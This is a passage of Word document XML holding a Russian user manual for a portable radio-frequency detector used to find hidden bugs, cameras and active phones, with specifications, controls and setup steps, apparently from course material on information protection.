    <w:p w:rsidR="00B45DB0" w:rsidRPr="005A644F" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ab"/>
      </w:pPr>
      <w:r w:rsidRPr="005A644F">
        <w:t>Назначение и область применения</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="005A644F" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005A644F">
        <w:t>Изделие позволяет осуществлять оперативный контроль мощности радиосигнала в диапазоне от 10 до 3500 МГц и может быть использовано для поиска в ближней зоне радиопередающих устройств: беспроводных «жучков», радиомикрофонов, скрытых беспроводных видеокамер, раций, работающих сотовых телефонов, подавителей и глушителей сотовой связи и т.д.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="005A644F" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ab"/>
      </w:pPr>
      <w:r w:rsidRPr="005A644F">
        <w:t>Программное обеспечение изделия обеспечивает:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="005A644F" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005A644F">
        <w:t>специальный алгоритм измерения мощности цифрового и аналогового радиосигнала, наглядное отображение ее усредненного и пикового значения на временном графике;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="005A644F" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005A644F">
        <w:t>регулировку чувствительности (выбор участка выходной характеристики чувствительного элемента для наиболее удобного поиска локального максимума сигнала);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="005A644F" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005A644F">
        <w:t xml:space="preserve">возможность работы в режиме охраны (подстройка под уровень окружающего фона и переход в спящий режим, с последующим выходом </w:t>
      </w:r>
      <w:r w:rsidRPr="005A644F">
        <w:lastRenderedPageBreak/>
        <w:t>из этого режима при появлении новых источников радиосигнала, со звуковой, графической и виброиндикацией);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="005A644F" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005A644F">
        <w:t>-демонстрацию на экране диаграммы изменения радиообстановки во времени;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="005A644F" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005A644F">
        <w:t xml:space="preserve">уменьшение влияния отдельных источников радиосигнала (таких, как базовые станции сотовой связи, а также точки доступа </w:t>
      </w:r>
      <w:r w:rsidRPr="005A644F">
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Wi-Fi) </w:t>
      </w:r>
      <w:r w:rsidRPr="005A644F">
        <w:t>на процесс поиска радиопередающих устройств;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="005A644F" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005A644F">
        <w:t>звуковую индикацию уровня принимаемого сигнала;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="005A644F" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005A644F">
        <w:t>виброиндикацию превышения усредненным сигналом заданного порога (с регулировкой интенсивности виброиндикации);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005A644F">
        <w:t>индикацию уровня заряда элементов питания.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="005A644F">
        <w:t>Технические характеристики</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="10" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7807"/>
        <w:gridCol w:w="2061"/>
      </w:tblGrid>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tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="005A644F" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2061" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="005A644F" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>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Габариты размеры изделия, мм, не более</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rPr>
                <w:lang w:bidi="en-US"/>
              </w:rPr>
              <w:t>105x58x18,5</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Масса изделия с элементами питания, кг, не более</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t>0,11</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 xml:space="preserve">Напряжение питания постоянного тока </w:t>
            </w:r>
            <w:r w:rsidRPr="005A644F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(два элемента питания типа ААА),</w:t>
            </w:r>
            <w:r w:rsidRPr="005A644F">
              <w:t xml:space="preserve"> В</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2061" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="005A644F" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="005A644F">
              <w:t>от 2,2 до 3,2</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Максимальная потребляемая мощность, Вт, не более</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t>0,6</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Диапазон рабочих частот, МГц</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t>от 10 до 3500</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Чувствительность при отключенных фильтрах, мВ/м, не менее</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t>50</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Динамический диапазон, дБ, не менее</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t>70</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Дальность обнаружения радиопередатчика мощностью 5 мВт, в условиях спокойного радиоэфира, м, не менее</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2061" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="005A644F" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="005A644F">
              <w:t>5</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Дальность обнаружения работающего сотового телефона, в условиях спокойного радиоэфира, м, не менее</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2061" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="005A644F" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="005A644F">
              <w:t>50</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tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="005A644F" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="005A644F">
              <w:t xml:space="preserve">Частотные диапазоны встроенных фильтров, МГц: </w:t>
            </w:r>
            <w:r w:rsidRPr="005A644F">
              <w:rPr>
                <w:lang w:bidi="en-US"/>
              </w:rPr>
              <w:t>-Wi-Fi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2061" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="005A644F" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="005A644F">
              <w:t>свыше 2400</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tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="005A644F" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="005A644F">
              <w:rPr>
                <w:lang w:bidi="en-US"/>
              </w:rPr>
              <w:t>-4G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2061" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="005A644F" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="005A644F">
              <w:t>от 832 до 862 и от 2620 до 2690</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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="005A644F" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="005A644F">
              <w:rPr>
                <w:lang w:bidi="en-US"/>
              </w:rPr>
              <w:t>-3G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2061" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="005A644F" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="005A644F">
              <w:t>от 2110 до 2170</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tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="005A644F" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="005A644F">
              <w:rPr>
                <w:lang w:bidi="en-US"/>
              </w:rPr>
              <w:t>-GSM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2061" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="005A644F" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="005A644F">
              <w:t>от 925 до 960 и От 1805 до 1880</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rPr>
                <w:lang w:bidi="en-US"/>
              </w:rPr>
              <w:t>-CDMA</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t>от 463 ДО 467,5</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Ослабление входного сигнала встроенными фильтрами в заданной полосе частот, дБ, не менее</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2061" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="005A644F" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="005A644F">
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="005A644F" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7807" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="005A644F" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="005A644F">
              <w:t>Продолжительность непрерывной работы (при отключенной звуковой и вибро индикации), мин. не менее:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="005A644F" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="005A644F">
              <w:t xml:space="preserve">- от 2 шт. алкалиновых батареек типа </w:t>
            </w:r>
            <w:r w:rsidRPr="005A644F">
              <w:rPr>
                <w:lang w:bidi="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">AAA GP Ultra </w:t>
            </w:r>
            <w:r w:rsidRPr="005A644F">
              <w:t>-от2 шт. аккумуляторов типа ААА (1100мА*ч)</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5A644F" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="005A644F">
              <w:t>400</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="005A644F" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="005A644F">
              <w:t>500</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="005A644F" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="005A644F">
        <w:t>Устройство и работа</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="005A644F" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="005A644F">
        <w:t xml:space="preserve">Изделие выполнено в виде портативного переносного прибора с автономным питанием. Корпус изготовленный из ударопрочного пластика </w:t>
      </w:r>
      <w:r w:rsidRPr="005A644F">
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ABS </w:t>
      </w:r>
      <w:r w:rsidRPr="005A644F">
        <w:t xml:space="preserve">(поз. 1), имеет отсек для установки элементов питания (поз. 2), закрывающийся крышкой (поз. 3). В корпусе также установлены: 9-ти кнопочная пленочная клавиатура (поз. 4), </w:t>
      </w:r>
      <w:r w:rsidRPr="005A644F">
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t>OLED</w:t>
      </w:r>
      <w:r w:rsidRPr="005A644F">
        <w:t xml:space="preserve">-дисплей (поз. 5), разъем </w:t>
      </w:r>
      <w:r w:rsidRPr="005A644F">
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">micro-USB </w:t>
      </w:r>
      <w:r w:rsidRPr="005A644F">
        <w:t xml:space="preserve">(поз. 6) для подключения зарядного устройства, гнездо (поз. 7) для </w:t>
      </w:r>
      <w:r w:rsidRPr="005A644F">
        <w:lastRenderedPageBreak/>
        <w:t>подключения наушников и выдвижная антенна (поз. 8). Расположение основных частей изделия представлено на Рис. 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="005A644F" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="005A644F" w:rsidRDefault="002C1237" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="0049237E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4518660" cy="3794760"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11" name="Рисунок 52" descr="Описание: J:\10.05.05\умк\ТЗИ л16 ЛБ8 ПР16\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J:\10.05.05\умк\ТЗИ л16 ЛБ8 ПР16\media\image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8660" cy="3794760"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="005A644F" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="005A644F" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="005A644F">
        <w:t>Вид экрана в режиме поиска представлен на Рис. 3. В процессе измерения на дисплее постоянно отображается усредненное (поз. 1) и пиковое (поз. 2) значение мощности принимаемого радиосигнала. Отображение производится в логарифмическом представлении, в масштабе, соответствующем выбранному диапазону чувствительности, в виде графика значений за последние 3 секунды. Также отображается график истории усредненных значений за последние 45 секунд (поз. 3), выбранный уровень чувствительности (поз. 4), порог срабатывания виброиндикации (поз. 6) по</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A644F">
        <w:t>шкале текущего значения мощности принимаемого сигнала (поз. 5). Изделие дополнительно отображает на экране состояние фильтров (включены или выключены, поз. 7), состояние вибро</w:t>
      </w:r>
      <w:r w:rsidRPr="005A644F">
        <w:softHyphen/>
        <w:t>индикации (включена или выключена, поз. 8), текущий звуковой режим (без звука, акустоиндикация или акустозавязка, поз. 9), текущий режим работы (поиск или охрана, поз. 10), а также текущее состояние элементов питания (поз. 11).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="005A644F" w:rsidRDefault="002C1237" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="0049237E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6080760" cy="2994660"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12" name="Рисунок 53" descr="Описание: J:\10.05.05\умк\ТЗИ л16 ЛБ8 ПР16\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J:\10.05.05\умк\ТЗИ л16 ЛБ8 ПР16\media\image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0760" cy="2994660"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="005A644F" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="005A644F" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="005A644F">
        <w:t>Управление изделием:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="005A644F" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="005A644F">
        <w:t>/К</w:t>
      </w:r>
      <w:r w:rsidRPr="005A644F">
        <w:tab/>
        <w:t>- кнопка "ПИТАНИЕ" позволяет включать/отключать изделие</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="005A644F" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="005A644F">
        <w:t>(длительным нажатием),</w:t>
      </w:r>
      <w:r w:rsidRPr="005A644F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> а также осуществлять выход из меню </w:t>
      </w:r>
      <w:r w:rsidRPr="005A644F">
        <w:t>(кратковременным нажатием);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="005A644F" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="005A644F">
        <w:t xml:space="preserve">Ф - кнопка "НАСТРОЙКИ" позволяет переключаться в меню основных настроек и обратно </w:t>
      </w:r>
      <w:r w:rsidRPr="005A644F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">(кратковременным нажатием) </w:t>
      </w:r>
      <w:r w:rsidRPr="005A644F">
        <w:t xml:space="preserve">и открыть краткую помощь пользователя </w:t>
      </w:r>
      <w:r w:rsidRPr="005A644F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(длительным нажатием);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="005A644F">
        <w:t>- данный блок позволяет осуществлять перемещение по меню с помощью стрелочек и производить выбор значений кнопкой "ОК";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="005A644F" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="005A644F">
        <w:t xml:space="preserve">ф - кнопка "СМЕНА РЕЖИМА" позволяет переключать режимы работы </w:t>
      </w:r>
      <w:r w:rsidRPr="005A644F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(кратковременным нажатием)</w:t>
      </w:r>
      <w:r w:rsidRPr="005A644F">
        <w:t xml:space="preserve"> и звуковые режимы </w:t>
      </w:r>
      <w:r w:rsidRPr="005A644F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(длительным нажатием);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="005A644F" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="005A644F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Y -</w:t>
      </w:r>
      <w:r w:rsidRPr="005A644F">
        <w:t xml:space="preserve"> получить быстрый доступ к меню выбора фильтров можно с помощью кнопки "ФИЛЬТРЫ".</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00FA5C5B" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00FA5C5B">
        <w:t>Подготовка к работе.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00FA5C5B" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00FA5C5B">
        <w:t>Для того, чтобы подготовить прибор к работе необходимо:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00FA5C5B" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5C5B">
        <w:t xml:space="preserve"> отвернув винт, снять крышку отсека питания (поз. 3 Рис. 2);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00FA5C5B" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5C5B">
        <w:t xml:space="preserve"> установить, соблюдая полярность (Рис. 4) элементы питания;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00FA5C5B" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5C5B">
        <w:t xml:space="preserve"> установить на место крышку отсека питания и закрепить ее винтом.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00FA5C5B" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5C5B">
        <w:t xml:space="preserve"> Использование изделия.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00FA5C5B" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5C5B">
        <w:t>Включение и выключение изделия.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00FA5C5B" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00FA5C5B" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00FA5C5B">
